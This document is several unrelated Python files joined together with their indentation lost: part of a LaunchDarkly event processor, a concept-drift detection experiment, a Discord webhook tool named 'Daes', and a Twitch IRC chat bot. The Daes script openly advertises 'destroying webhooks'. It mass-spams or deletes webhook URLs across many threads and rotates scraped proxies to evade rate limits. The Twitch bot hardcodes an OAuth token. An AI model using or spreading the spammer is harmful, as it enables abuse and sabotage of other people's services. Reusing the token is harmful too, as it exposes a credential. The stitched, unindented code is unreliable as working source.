# Decide whether to add the event to the payload. Feature events may be added twice, once for
# the event (if tracked) and once for debugging.
add_full_event = False
add_debug_event = False
add_index_event = False
if event['kind'] == "feature":
add_full_event = event.get('trackEvents')
add_debug_event = self._should_debug_event(event)
else:
add_full_event = True
# For each user we haven't seen before, we add an index event - unless this is already
# an identify event for that user.
if not (add_full_event and self._config.inline_users_in_events):
user = event.get('user')
if user and 'key' in user:
is_index_event = event['kind'] == 'identify'
already_seen = self.notice_user(user)
add_index_event = not is_index_event and not already_seen
if not is_index_event and already_seen:
self._deduplicated_users += 1
if add_index_event:
ie = { 'kind': 'index', 'creationDate': event['creationDate'], 'user': user }
self._outbox.add_event(ie)
if add_full_event:
self._outbox.add_event(event)
if add_debug_event:
debug_event = event.copy()
debug_event['debug'] = True
self._outbox.add_event(debug_event)
# Add to the set of users we've noticed, and return true if the user was already known to us.
def notice_user(self, user):
if user is None or 'key' not in user:
return False
key = user['key']
return self._user_keys.put(key, True)
def _should_debug_event(self, event):
debug_until = event.get('debugEventsUntilDate')
if debug_until is not None:
last_past = self._last_known_past_time
now = int(time.time() * 1000)
if debug_until > last_past and debug_until > now:
return True
return False
def _trigger_flush(self):
if self._disabled:
return
payload = self._outbox.get_payload()
if self._diagnostic_accumulator:
self._diagnostic_accumulator.record_events_in_batch(len(payload.events))
if len(payload.events) > 0 or len(payload.summary.counters) > 0:
task = EventPayloadSendTask(self._http, self._config, self._formatter, payload,
self._handle_response)
if self._flush_workers.execute(task.run):
# The events have been handed off to a flush worker; clear them from our buffer.
self._outbox.clear()
else:
# We're already at our limit of concurrent flushes; leave the events in the buffer.
pass
def _handle_response(self, r):
server_date_str = r.getheader('Date')
if server_date_str is not None:
server_date = parsedate(server_date_str)
if server_date is not None:
timestamp = int(timegm(server_date) * 1000)
self._last_known_past_time = timestamp
if r.status > 299 and not is_http_error_recoverable(r.status):
self._disabled = True
return
def _send_and_reset_diagnostics(self):
if self._diagnostic_accumulator is not None:
dropped_event_count = self._outbox.get_and_clear_dropped_count()
stats_event = self._diagnostic_accumulator.create_event_and_reset(dropped_event_count, self._deduplicated_users)
self._deduplicated_users = 0
task = DiagnosticEventSendTask(self._http, self._config, stats_event)
self._diagnostic_flush_workers.execute(task.run)
def _do_shutdown(self):
self._flush_workers.stop()
self._flush_workers.wait()
if self._close_http:
self._http.clear()
class DefaultEventProcessor(EventProcessor):
def __init__(self, config, http=None, dispatcher_class=None, diagnostic_accumulator=None):
self._inbox = queue.Queue(config.events_max_pending)
self._inbox_full = False
self._flush_timer = RepeatingTimer(config.flush_interval, self.flush)
self._users_flush_timer = RepeatingTimer(config.user_keys_flush_interval, self._flush_users)
self._flush_timer.start()
self._users_flush_timer.start()
if diagnostic_accumulator is not None:
self._diagnostic_event_timer = RepeatingTimer(config.diagnostic_recording_interval, self._send_diagnostic)
self._diagnostic_event_timer.start()
else:
self._diagnostic_event_timer = None
self._close_lock = Lock()
self._closed = False
(dispatcher_class or EventDispatcher)(self._inbox, config, http, diagnostic_accumulator)
def send_event(self, event):
event['creationDate'] = int(time.time() * 1000)
self._post_to_inbox(EventProcessorMessage('event', event))
def flush(self):
self._post_to_inbox(EventProcessorMessage('flush', None))
def stop(self):
with self._close_lock:
if self._closed:
return
self._closed = True
self._flush_timer.stop()
self._users_flush_timer.stop()
if self._diagnostic_event_timer:
self._diagnostic_event_timer.stop()
self.flush()
# Note that here we are not calling _post_to_inbox, because we *do* want to wait if the inbox
# is full; an orderly shutdown can't happen unless these messages are received.
self._post_message_and_wait('stop')
def _post_to_inbox(self, message):
try:
self._inbox.put(message, block=False)
except queue.Full:
if not self._inbox_full:
# possible race condition here, but it's of no real consequence - we'd just get an extra log line
self._inbox_full = True
log.warning("Events are being produced faster than they can be processed; some events will be dropped")
def _flush_users(self):
self._inbox.put(EventProcessorMessage('flush_users', None))
def _send_diagnostic(self):
self._inbox.put(EventProcessorMessage('diagnostic', None))
# Used only in tests
def _wait_until_inactive(self):
self._post_message_and_wait('test_sync')
def _post_message_and_wait(self, type):
reply = Event()
self._inbox.put(EventProcessorMessage(type, reply))
reply.wait()
# These magic methods allow use of the "with" block in tests
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.stop()
def _post_events_with_retry(
http_client,
config,
uri,
payload_id,
body,
events_description
):
hdrs = _headers(config)
hdrs['Content-Type'] = 'application/json'
if payload_id:
hdrs['X-LaunchDarkly-Event-Schema'] = str(__CURRENT_EVENT_SCHEMA__)
hdrs['X-LaunchDarkly-Payload-ID'] = payload_id
can_retry = True
context = "posting %s" % events_description
while True:
next_action_message = "will retry" if can_retry else "some events were dropped"
try:
r = http_client.request(
'POST',
uri,
headers=hdrs,
body=body,
timeout=urllib3.Timeout(connect=config.http.connect_timeout, read=config.http.read_timeout),
retries=0
)
if r.status < 300:
return r
recoverable = check_if_error_is_recoverable_and_log(context, r.status, None, next_action_message)
if not recoverable:
return r
except Exception as e:
check_if_error_is_recoverable_and_log(context, None, str(e), next_action_message)
if not can_retry:
return None
can_retry = False
# fixed delay of 1 second for event retries
time.sleep(1)
|
main_experiments.py
|
import argparse
import copy
import json
import logging
import os
import shutil
import sys
import time
import warnings
from datetime import datetime
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
import torch
import torch.multiprocessing as mp
import torch.nn as nn
from sklearn.datasets import make_classification, make_blobs
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from torch.utils.data import DataLoader, TensorDataset
from src.models.MLP import MetaMLP
from src.utils.constraint_module import CentroidLoss
from src.utils.drift_helper import detection_helper
from src.utils.global_var import OUTPATH, columns
from src.utils.induce_concept_drift import induce_drift, corrupt_drift
from src.utils.load_datasets import load_data
from src.utils.log_utils import StreamToLogger
from src.utils.plotting_utils import plot_embedding
from src.utils.saver import Saver, SaverSlave
from src.utils.utils import readable, predict, check_ziplen, remove_duplicates, linear_interp, train_model, \
evaluate_model
warnings.filterwarnings("ignore")
torch.backends.cudnn.benchmark = True
sns.set_style("whitegrid")
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
######################################################################################################
def run(x, args, path, result_path):
print('Process PID:', os.getpid())
args.init_seed = x
df_run = single_experiment(args, path)
if os.path.exists(result_path):
df_run.to_csv(result_path, mode='a', sep=',', header=False, index=False)
else:
df_run.to_csv(result_path, mode='a', sep=',', header=True, index=False)
def parse_args():
parser = argparse.ArgumentParser(description='Concept drift detection experiments.'
'By default the constrained module is used.')
parser.add_argument('--dataset', type=str, default='RBF', choices=(
'fin_adult', 'fin_wine', 'fin_bank', 'fin_digits08', 'fin_digits17', 'fin_musk', 'fin_phis', 'phishing', 'spam',
'RBF', 'MovRBF'))
# Synthetic data parameters
parser.add_argument('--features', type=int, default=20)
parser.add_argument('--classes', type=int, default=4)
parser.add_argument('--informative', type=int, default=10)
parser.add_argument('--redundant', type=int, default=0)
parser.add_argument('--drift_features', type=str, default='top',
help='Which features to corrupt. Choices: top - bottom - list with features')
parser.add_argument('--drift_type', type=str, default='gradual', choices=('step', 'gradual'))
parser.add_argument('--drift_p', type=float, default=0.25, help='Percentage of features to corrupt')
parser.add_argument('--detectors', type=str, nargs='+',
default=['ZScore', 'IRQ', 'P_modified', 'EMA', 'HDDDM_Emb', 'HDDDM_Input', 'IKS_emb',
'DDM', 'EDDM', 'ADWIN'],
choices=(
'ZScore', 'IRQ', 'P_modified', 'EMA', 'HDDDM_Emb', 'HDDDM_Input', 'IKS_Input',
'IKS_emb_raw', 'IKS_emb', 'KSWIN_Emb', 'PH_Emb', 'PH_error', 'DDM', 'EDDM', 'ADWIN',
'MMD_Input', 'MMD_Emb', 'Chi_Input', 'Chi_Emb', 'LSD_Input', 'LSD_Emb', 'KS_Input',
'KS_Emb'), help='Available drift detectors')
parser.add_argument('--dyn_update', action='store_true', default=False, help='Drift statistic dynamic update')
parser.add_argument('--drift_history', type=int, nargs='+', default=[25, 50], help='Drift detection history size')
parser.add_argument('--drift_th', type=int, nargs='+', default=[10, 50], help='Drift detection threshold')
parser.add_argument('--batch_size', type=int, default=32)
parser.add_argument('--epochs', type=int, default=50)
parser.add_argument('--learning_rate', type=float, default=1e-3)
parser.add_argument('--hidden_activation', type=str, default='nn.ReLU()')
parser.add_argument('--unconstrained', action='store_true', default=False, help='Not use constrained module')
parser.add_argument('--momentum', type=float, default=0.9)
parser.add_argument('--normalization', type=str, default='none')
parser.add_argument('--dropout', type=float, default=0.25)
parser.add_argument('--l2penalty', type=float, default=0.001)
parser.add_argument('--num_workers', type=int, default=0, help='PyTorch dataloader worker. Set to 0 if debug.')
parser.add_argument('--init_seed', type=int, default=420, help='RNG seed. Typ. 42, 420, 1337, 0, 69.')
parser.add_argument('--n_runs', type=int, default=1, help='Number or runs')
parser.add_argument('--process', type=int, default=1, help='Number of parallel process. Single GPU.')
parser.add_argument('--neurons', nargs='+', type=int, default=[100, 50, 20])
parser.add_argument('--classifier_dim', type=int, default=20)
parser.add_argument('--embedding_size', type=int, default=3)
# Suppress terminal out
parser.add_argument('--disable_print', action='store_true', default=False)
parser.add_argument('--plt_loss', action='store_true', default=True)
parser.add_argument('--plt_embedding', action='store_true', default=False)
parser.add_argument('--plt_loss_hist', action='store_true', default=True)
parser.add_argument('--plt_cm', action='store_true', default=True)
parser.add_argument('--plt_recons', action='store_true', default=True)
parser.add_argument('--headless', action='store_true', default=False, help='Matplotlib backend')
# Add parameters for each particular network
args = parser.parse_args()
return args
######################################################################################################
def load_corrupt_data(args):
# Loading data
if args.dataset == 'MovRBF':
# Blobs dataset with drift induced by moving centroids
X, y, centers = make_blobs(n_samples=2000, n_features=args.features, centers=args.classes, cluster_std=1.0,
return_centers=True)
x_test_, Y_test_, centers_end = make_blobs(n_samples=1000, n_features=args.features, centers=args.classes,
cluster_std=1.0,
return_centers=True)
Y_test_ = Y_test_[:, np.newaxis]
x_test, Y_test = make_blobs(n_samples=500, n_features=args.features, centers=centers, cluster_std=1.0)
Y_test = Y_test[:, np.newaxis]
if args.drift_type == 'gradual':
for i in [x * 0.1 for x in range(2, 12, 2)]:
x_, y_ = make_blobs(n_samples=100, n_features=args.features,
centers=linear_interp(centers_end, centers, i),
cluster_std=1.0)
y_ = y_[:, np.newaxis]
x_test = np.vstack([x_test, x_])
Y_test = np.vstack([Y_test, y_])
x_test = np.vstack([x_test, x_test_])
Y_test = np.vstack([Y_test, Y_test_])
Y_test = Y_test.squeeze(1)
t_start = 500
t_end = t_start
x_train, x_valid, Y_train, Y_valid = train_test_split(X, y, shuffle=True, test_size=0.2)
# Data Scaling
normalizer = StandardScaler()
x_train = normalizer.fit_transform(x_train)
x_valid = normalizer.transform(x_valid)
x_test = normalizer.transform(x_test)
# Encode labels
unique_train = np.unique(Y_train)
label_encoder = dict(zip(unique_train, range(len(unique_train))))
unique_test = np.setdiff1d(np.unique(y), unique_train)
label_encoder.update(dict(zip(unique_test, range(len(unique_train), len(np.unique(y))))))
Y_train = np.array([label_encoder.get(e, e) for e in Y_train])
Y_valid = np.array([label_encoder.get(e, e) for e in Y_valid])
Y_test = np.array([label_encoder.get(e, e) for e in Y_test])
else:
# RBF or UCI datasets with drift induced by corrupting the features
if args.dataset == 'RBF':
# Loading data
X, y = make_classification(n_samples=2000, n_features=args.features, n_informative=args.informative,
n_redundant=args.redundant, n_repeated=0, n_classes=args.classes,
n_clusters_per_class=1, weights=None, flip_y=0.0, class_sep=2., hypercube=True,
shift=0.0, scale=1.0, shuffle=True, random_state=args.init_seed)
else:
# UCI datasets
X, y = load_data(args.dataset)
x_train, x_test, Y_train, Y_test = train_test_split(X, y, shuffle=False, train_size=0.6)
x_train, x_valid, Y_train, Y_valid = train_test_split(x_train, Y_train, shuffle=False, test_size=0.2)
# scale data before corruption!!!
# Data Scaling
normalizer = StandardScaler()
x_train = normalizer.fit_transform(x_train)
x_valid = normalizer.transform(x_valid)
x_test = normalizer.transform(x_test)
# Encode labels
unique_train = np.unique(Y_train)
label_encoder = dict(zip(unique_train, range(len(unique_train))))
unique_test = np.setdiff1d(np.unique(y), unique_train)
label_encoder.update(dict(zip(unique_test, range(len(unique_train), len(np.unique(y))))))
Y_train = np.array([label_encoder.get(e, e) for e in Y_train])
Y_valid = np.array([label_encoder.get(e, e) for e in Y_valid])
Y_test = np.array([label_encoder.get(e, e) for e in Y_test])
# Induce Drift
test_samples = len(x_test)
if args.drift_type == 'step':
t_start = int(0.60 * test_samples)
t_end = t_start
x_test, permute_dict = induce_drift(x_test, y=Y_test, t_start=t_start, t_end=None, p=args.drift_p,
features=args.drift_features, copy=False)
elif args.drift_type == 'gradual':
t_start = int(0.60 * test_samples)
t_end = t_start + int(0.20 * test_samples)
# t_end = t_start
x_test, permute_dict = corrupt_drift(x_test, y=Y_test, t_start=t_start, t_end=t_end, p=args.drift_p,
features=args.drift_features, loc=1.0, std=1.0, copy=False)
classes = len(np.unique(Y_train))
print('Num Classes: ', classes)
print('Train:', x_train.shape, Y_train.shape, [(Y_train == i).sum() for i in np.unique(Y_train)])
print('Validation:', x_valid.shape, Y_valid.shape,
[(Y_valid == i).sum() for i in np.unique(Y_valid)])
print('Test:', x_test.shape, Y_test.shape,
[(Y_test == i).sum() for i in np.unique(Y_test)])
return x_train, Y_train, x_valid, Y_valid, x_test, Y_test, t_start, t_end
######################################################################################################
def single_experiment(args, path):
path = os.path.join(path, 'seed_{}'.format(args.init_seed))
saver = SaverSlave(path)
# Logging setting
print('run logfile at: ', os.path.join(saver.path, 'logfile.log'))
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(name)s: %(message)s',
datefmt='%m/%d/%Y %H:%M:%S',
filename=os.path.join(saver.path, 'logfile.log'),
filemode='a'
)
# Redirect stdout
stdout_logger = logging.getLogger('STDOUT')
slout = StreamToLogger(stdout_logger, logging.INFO)
sys.stdout = slout
# Redirect stderr
stderr_logger = logging.getLogger('STDERR')
slerr = StreamToLogger(stderr_logger, logging.ERROR)
sys.stderr = slerr
# Suppress output
if args.disable_print:
slout.terminal = open(os.devnull, 'w')
slerr.terminal = open(os.devnull, 'w')
######################################################################################################
# Loading data
x_train, Y_train, x_valid, Y_valid, x_test, Y_test, t_start, t_end = load_corrupt_data(args)
test_samples = len(x_test)
######################################################################################################
# Model definition
classes = len(np.unique(Y_train))
args.nbins = classes
model = MetaMLP(input_shape=x_train.shape[1], embedding_dim=args.embedding_size, n_class=classes,
hidden_neurons=args.neurons, hidd_act=eval(args.hidden_activation), dropout=args.dropout,
normalization=args.normalization, name='MLP').to(device)
nParams = sum([p.nelement() for p in model.parameters()])
s = 'MODEL: %s: Number of parameters: %s' % ('MLP', readable(nParams))
print(s)
######################################################################################################
# Main loop
train_dataset = TensorDataset(torch.from_numpy(x_train).float(), torch.from_numpy(Y_train).long())
valid_dateset = TensorDataset(torch.from_numpy(x_valid).float(), torch.from_numpy(Y_valid).long())
test_dateset = TensorDataset(torch.from_numpy(x_test).float(), torch.from_numpy(Y_test).long())
train_loader = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True, drop_last=False,
num_workers=args.num_workers, pin_memory=True)
valid_loader = DataLoader(valid_dateset, batch_size=args.batch_size, shuffle=False, drop_last=False,
num_workers=args.num_workers, pin_memory=True)
test_loader = DataLoader(test_dateset, batch_size=args.batch_size, shuffle=False, drop_last=False,
num_workers=args.num_workers, pin_memory=True)
######################################################################################################
if args.unconstrained:
loss_centroids = None
param_list = list(filter(lambda p: p.requires_grad, model.parameters()))
else:
loss_centroids = CentroidLoss(feat_dim=args.embedding_size, num_classes=classes, reduction='mean').to(device)
param_list = list(filter(lambda p: p.requires_grad, model.parameters())) + list(loss_centroids.parameters())
optimizer = torch.optim.SGD(param_list, lr=args.learning_rate, weight_decay=args.l2penalty, momentum=args.momentum)
criterion = nn.CrossEntropyLoss(reduction='none', weight=None)
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=15, gamma=0.1)
# Train model
model, loss_centroids = train_model(model, train_loader, valid_loader, latent_constraint=loss_centroids,
epochs=args.epochs, optimizer=optimizer,
scheduler=scheduler, criterion=criterion,
saver=saver, plot_loss_flag=args.plt_loss)
print('Train ended')
######################################################################################################
# Eval
train_loader = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=False, drop_last=False,
num_workers=args.num_workers, pin_memory=True)
train_results = evaluate_model(model, train_loader, Y_train, saver=saver, network='MLP', datatype='Train',
plt_cm=args.plt_cm, plt_pred=False)
valid_results = evaluate_model(model, valid_loader, Y_valid, saver=saver, network='MLP', datatype='Valid',
plt_cm=args.plt_cm, plt_pred=False)
test_results = evaluate_model(model, test_loader, Y_test, saver=saver, network='MLP', datatype='Test',
plt_cm=args.plt_cm, plt_pred=True)
# Embeddings
train_embedding = predict(model.encoder, train_loader).squeeze()
valid_embedding = predict(model.encoder, valid_loader).squeeze()
test_embedding = predict(model.encoder, test_loader).squeeze()
# Get centroids position
if args.unconstrained:
cc = []
for i in range(len(np.unique(Y_train))):
cc.append(train_embedding[Y_train == i].mean(axis=0))
cluster_centers = np.array(cc)
else:
cluster_centers = loss_centroids.centers.detach().cpu().numpy()
if train_embedding.shape[1] <= 3:
plot_embedding(train_embedding, valid_embedding, Y_train, Y_valid, cluster_centers, classes=classes,
saver=saver,
figname='Train data')
plot_embedding(valid_embedding, test_embedding, Y_valid, Y_test, cluster_centers, classes=classes, saver=saver,
figname='Test (drift) data')
else:
print('Skipping embedding plot')
######################################################################################################
# Begin Drift detection part
######################################################################################################
# Test predictions
yhat_ = predict(model, test_loader)
yhat = yhat_.argmax(axis=1)
y_binary = (yhat == Y_test).astype(int)
y_binary = 1 - y_binary
# Running accuracy
w = 50
running_accuracy = np.empty(test_samples)
for t in range(test_samples):
if t < w:
score = accuracy_score(yhat[:t], Y_test[:t])
else:
score = accuracy_score(yhat[t - w:t], Y_test[t - w:t])
running_accuracy[t] = score
# First sample will be NaN
running_accuracy[0] = running_accuracy[1]
# Check other nans and fill with zero
if np.isnan(running_accuracy).any():
running_accuracy[np.where(np.isnan(running_accuracy))[0]] = 0
n = len(running_accuracy)
plt.figure()
plt.plot([x for x in range(n)], running_accuracy)
for t in (t_start, t_end):
plt.axvline(t, linestyle='-.', c='blue')
plt.title(f'running accuracy (Winsize={w})')
plt.tight_layout()
saver.save_fig(plt.gcf(), 'running_acc')
# plt.show(block=True)
######################################################################################################
df = pd.DataFrame()
detectors = ['ZScore', 'IRQ', 'P_modified', 'EMA', 'HDDDM_Emb', 'HDDDM_Input', 'IKS_emb',
'DDM', 'EDDM', 'ADWIN']
for d in args.drift_history:
skip_flag = False
for c in args.drift_th:
if skip_flag and d * c * 0.01 <= 1:
continue
df_results, drift_idxs, warning_idxs, obj = detection_helper(x_valid, x_test, valid_embedding,
test_embedding, y_binary, running_accuracy,
cluster_centers,
saver, d, c, t_start, t_end, args,
detectors_list=args.detectors)
if d * c * 0.01 <= 1:
skip_flag = True
df = df.append(df_results)
# Complete dataframe
df['train_acc'] = train_results['acc']
df['valid_acc'] = valid_results['acc']
df['drift_acc'] = test_results['acc']
df['dataset'] = args.dataset
df['constrained'] = str(not args.unconstrained)
df['features'] = args.drift_features
df.to_csv(os.path.join(saver.path, 'results_df.csv'), sep=',', index=False)
plt.close('all')
# g = sns.relplot(data=df, y='drift_delay', x='drift_false_positive', hue='name', style='detection_winsize',
# col='counter', palette='Paired', kind='scatter', markers=True, dashes=False, sizes=10)
# plt.savefig(os.path.join(saver.path, 'final.png'), bbox_inches='tight')
# g = sns.relplot(data=df, y='drift_delay', x='drift_false_positive', hue='name', style='counter',
# col='detection_winsize', palette='Paired', kind='scatter', markers=True, dashes=False, sizes=10)
# plt.savefig(os.path.join(saver.path, 'final2.png'), bbox_inches='tight')
return df
if __name__ == '__main__':
args = parse_args()
print(args)
print()
######################################################################################################
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
SEED = args.init_seed
np.random.seed(SEED)
torch.manual_seed(SEED)
if device == 'cuda':
torch.cuda.manual_seed(SEED)
if args.headless:
print('Setting Headless support')
plt.switch_backend('Agg')
else:
backend = 'Qt5Agg'
print('Swtiching matplotlib backend to', backend)
plt.switch_backend(backend)
print()
######################################################################################################
# LOG STUFF
# Declare saver object
if args.dataset == 'MovRBF':
saver = Saver(OUTPATH, os.path.basename(__file__).split(sep='.py')[0],
hierarchy=os.path.join(args.dataset,
args.drift_type,
str(not args.unconstrained)))
else:
saver = Saver(OUTPATH, os.path.basename(__file__).split(sep='.py')[0],
hierarchy=os.path.join(args.dataset,
args.drift_type,
args.drift_features,
str(not args.unconstrained)))
# Save json of args/parameters
with open(os.path.join(saver.path, 'args.json'), 'w') as fp:
json.dump(vars(args), fp, indent=4)
######################################################################################################
# Main loop
csv_path = os.path.join(saver.path, '{}_{}_results.csv'.format(args.dataset, args.drift_features))
seeds_list = list(np.random.choice(1000, args.n_runs, replace=False))
seeds_list = check_ziplen(seeds_list, args.process)
total_run = args.n_runs
iterator = zip(*[seeds_list[j::args.process] for j in range(args.process)])
total_iter = len(list(iterator))
torch.multiprocessing.set_start_method('spawn', force=True)
start_datetime = datetime.now()
print('{} - Start Experiments. {} parallel process. Single GPU. \r\n'.format(
start_datetime.strftime("%d/%m/%Y %H:%M:%S"), args.process))
for i, (x) in enumerate(zip(*[seeds_list[j::args.process] for j in range(args.process)])):
start_time = time.time()
x = remove_duplicates(x)
n_process = len(x)
idxs = [i * args.process + j for j in range(1, n_process + 1)]
print('/' * shutil.get_terminal_size().columns)
print(
'ITERATION: {}/{}'.format(idxs, total_run).center(columns))
print('/' * shutil.get_terminal_size().columns)
process = []
for j in range(n_process):
process.append(mp.Process(target=run, args=(x[j], copy.deepcopy(args), saver.path, csv_path)))
for p in process:
p.start()
for p in process:
p.join()
end_time = time.time()
iter_seconds = end_time - start_time
total_seconds = end_time - start_datetime.timestamp()
print('Iteration time: {} - ETA: {}'.format(time.strftime("%Mm:%Ss", time.gmtime(iter_seconds)),
time.strftime('%Hh:%Mm:%Ss',
time.gmtime(
total_seconds * (total_iter / (i + 1) - 1)))))
print()
print('*' * shutil.get_terminal_size().columns)
print('DONE!')
end_datetime = datetime.now()
total_seconds = (end_datetime - start_datetime).total_seconds()
print('{} - Experiment took: {}'.format(end_datetime.strftime("%d/%m/%Y %H:%M:%S"),
time.strftime("%Hh:%Mm:%Ss", time.gmtime(total_seconds))))
print(f'results dataframe saved in: {csv_path}')
|
main.py
|
import os
import ctypes
import requests
import time
import random
import json
import threading
from colorama import Fore, init
init(autoreset=True)
if os.name == "nt":
os.system("mode con: cols=138 lines=30")
locker = threading.Lock()
proxies_list = []
def title(text):
if os.name == "nt":
ctypes.windll.kernel32.SetConsoleTitleW(f"Daes | By Goldfire | {text}")
else:
print(f"\33]0;Daes | By Goldfire | {text}\a", end="", flush=True)
def logo():
if os.name == "nt":
os.system("cls")
else:
os.system("clear")
print(f"""{Fore.LIGHTBLUE_EX}
▓█████▄ ▄▄▄ ▓█████ ██████
▒██▀ ██▌▒████▄ ▓█ ▀ ▒██ ▒
░██ █▌▒██ ▀█▄ ▒███ ░ ▓██▄
░▓█▄ ▌░██▄▄▄▄██ ▒▓█ ▄ ▒ ██▒
░▒████▓ ▓█ ▓██▒░▒████▒▒██████▒▒
▒▒▓ ▒ ▒▒ ▓▒█░░░ ▒░ ░▒ ▒▓▒ ▒ ░
░ ▒ ▒ ▒ ▒▒ ░ ░ ░ ░░ ░▒ ░ ░
░ ░ ░ ░ ▒ ░ ░ ░ ░
░ ░ ░ ░ ░ ░
░
{Fore.LIGHTYELLOW_EX}Destroying webhooks has never been {Fore.LIGHTGREEN_EX}easier{Fore.LIGHTYELLOW_EX}.
{Fore.RESET}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n
""")
def proxies_scraper():
global proxies_list
while True:
response = requests.get("https://api.proxyscrape.com/v2/?request=getproxies&protocol=socks4&timeout=10000&country=all&simplified=true")
proxies_list = response.text.splitlines()
time.sleep(60)
def proxies_random():
proxy = random.choice(proxies_list)
proxies = {
"http": f"socks4://{proxy}",
"https": f"socks4://{proxy}"
}
return proxies
def spammer(use_proxies, url, username, avatar_url, message):
while True:
try:
if use_proxies == "y":
proxy = proxies_random()
else:
proxy = {
"http": None,
"https": None
}
response = requests.post(url, json={"username": username, "avatar_url": avatar_url, "content": message}, proxies=proxy)
if response.status_code != 204:
if response.status_code == 404:
locker.acquire()
print(f"{Fore.LIGHTRED_EX}[Invalid Webhook] {url.split('webhooks/')[1]}")
locker.release()
break
elif response.status_code == 429:
time.sleep(float(json.loads(response.content)['retry_after'] / 1000))
else:
locker.acquire()
print(f"{Fore.LIGHTRED_EX}[Unknown Error - {response.status_code}] {url.split('webhooks/')[1]}")
locker.release()
else:
locker.acquire()
print(f"{Fore.LIGHTGREEN_EX}[Success] {url.split('webhooks/')[1]}")
locker.release()
except:
pass
def deleter(use_proxies, url):
global success, errors
request_sent = False
while not request_sent:
try:
if use_proxies == "y":
proxy = proxies_random()
else:
proxy = {
"http": None,
"https": None
}
response = requests.delete(url, proxies=proxy, timeout=5)
request_sent = True
if response.status_code != 204:
errors += 1
if response.status_code == 404:
locker.acquire()
print(f"{Fore.LIGHTRED_EX}[Invalid Webhook] {url.split('webhooks/')[1]}")
locker.release()
else:
success += 1
locker.acquire()
print(f"{Fore.LIGHTGREEN_EX}[Success] {url.split('webhooks/')[1]}")
locker.release()
if success + errors == total_url:
title("Deleting - Finished")
logo()
print(f"{Fore.LIGHTGREEN_EX}{success} webhooks have been deleted with success.")
print(f"{Fore.LIGHTRED_EX}{errors} webhooks encountered errors while deleting them.")
time.sleep(5)
init()
except:
pass
def init():
global total_url, success, errors
title("Initialization")
logo()
print(f"{Fore.LIGHTMAGENTA_EX}Do you want to spam webhook? (y/n if you want to delete)")
spam_webhooks = input("\n~# ").lower()
logo()
print(f"{Fore.LIGHTMAGENTA_EX}Do you want to destroy multiple webhooks? (y/n)")
multiple_webhooks = input("\n~# ").lower()
if multiple_webhooks == "n":
logo()
print(f"{Fore.LIGHTMAGENTA_EX}Enter Webhook URL you want to destroy.")
url = input("\n~# ")
else:
logo()
print(f"{Fore.LIGHTMAGENTA_EX}Enter file name that contains webhooks. (with .txt)")
webhooks_file = input("\n~# ")
if spam_webhooks == "y":
logo()
print(f"{Fore.LIGHTMAGENTA_EX}Enter webhook's username.")
username = input("\n~# ")
logo()
print(f"{Fore.LIGHTMAGENTA_EX}Enter webhook's avatar URL. (Empty for no avatar)")
avatar_url = input("\n~# ")
logo()
print(f"{Fore.LIGHTMAGENTA_EX}Enter message you want to spam.")
message = input("\n~# ")
logo()
print(f"{Fore.LIGHTMAGENTA_EX}How many threads?")
try:
threads_count = int(input("\n~# "))
except:
logo()
print(f"{Fore.LIGHTRED_EX}[Error] Invalid threads count.")
time.sleep(5)
init()
logo()
print(f"{Fore.LIGHTMAGENTA_EX}Do you want to use proxies? (Recommanded, y/n)")
use_proxies = input("\n~# ").lower()
if spam_webhooks == "y":
title("Spamming")
logo()
if use_proxies == "y":
threading.Thread(target=proxies_scraper).start()
while len(proxies_list) == 0:
time.sleep(0.5)
if multiple_webhooks == "n":
for i in range(0, threads_count):
threading.Thread(target=spammer, args=(use_proxies, url, username, avatar_url, message)).start()
else:
with open(webhooks_file) as file:
for line in file:
for i in range(0, threads_count):
threading.Thread(target=spammer, args=(use_proxies, line.rstrip(), username, avatar_url, message)).start()
file.close()
else:
title("Deleting")
logo()
if use_proxies == "y":
threading.Thread(target=proxies_scraper).start()
while len(proxies_list) == 0:
time.sleep(0.5)
success = 0
errors = 0
if multiple_webhooks == "n":
total_url = 1
threading.Thread(target=deleter, args=(use_proxies, url,)).start()
else:
total_url = len(open(webhooks_file).readlines())
with open(webhooks_file) as file:
for line in file:
threading.Thread(target=deleter, args=(use_proxies, line.rstrip(),)).start()
file.close()
if __name__ == "__main__":
try:
init()
except KeyboardInterrupt:
exit()
|
hirc.py
|
import os
import sys
import time
import threading
import irc_bot_noblock
from datetime import datetime
# change it to your own
# get your oauth here: https://twitchapps.com/tmi/
nickname = 'twitch_plays_3ds'
oauth = 'oauth:qmdwk3rsm4qau59zf2dpxixsf4wxzf'
def ensure_dir(dir_path):
if not os.path.exists(dir_path):
print("creating directory " + dir_path)
os.makedirs(dir_path)
def worker():
global last_message
while 1:
last_message = input()
time.sleep(0.01)
def safe_print(item):
try:
print(item)
except Exception:
print(item.encode('utf-8'))
def log_msg(name, msg):
msg = msg.replace('\r', '').replace('\n', '')
with open('./comment_log/' + chat_channel + ".txt", mode='a', encoding='utf-8') as log_file:
log_file.write(datetime.utcnow().isoformat(sep='T') + "Z " + name + ': ' + msg + '\r\n')
if(len(sys.argv) != 2):
print (__file__ + ' chat_channel')
exit()
ensure_dir('./comment_log')
last_message = ''
chat_channel = sys.argv[1].lower().lstrip().rstrip()
chat_server = ['irc.chat.twitch.tv', 6667]
bot = irc_bot_noblock.irc_bot(nickname, oauth, chat_channel, chat_server[0], chat_server[1], timeout=300)
bot.connect()
t = threading.Thread(target=worker)
t.start()
while 1:
tmi_list = bot.get_parsed_message()
tmi_list.reverse()
for item in [x for x in tmi_list if "." not in x.username]:
message_orig = item.message.replace(chr(1) + "ACTION", "/me").replace(chr(1), '').lstrip().rstrip()
log_msg(item.username, message_orig)
safe_print(item.username + ": " + message_orig)
if last_message != '':
safe_print(">> " + nickname + ": " + last_message)
bot.send_message(last_message)
log_msg(nickname, last_message)
last_message = ''
time.sleep(0.01)
|
_OSA_Jupyter-checkpoint.py
|
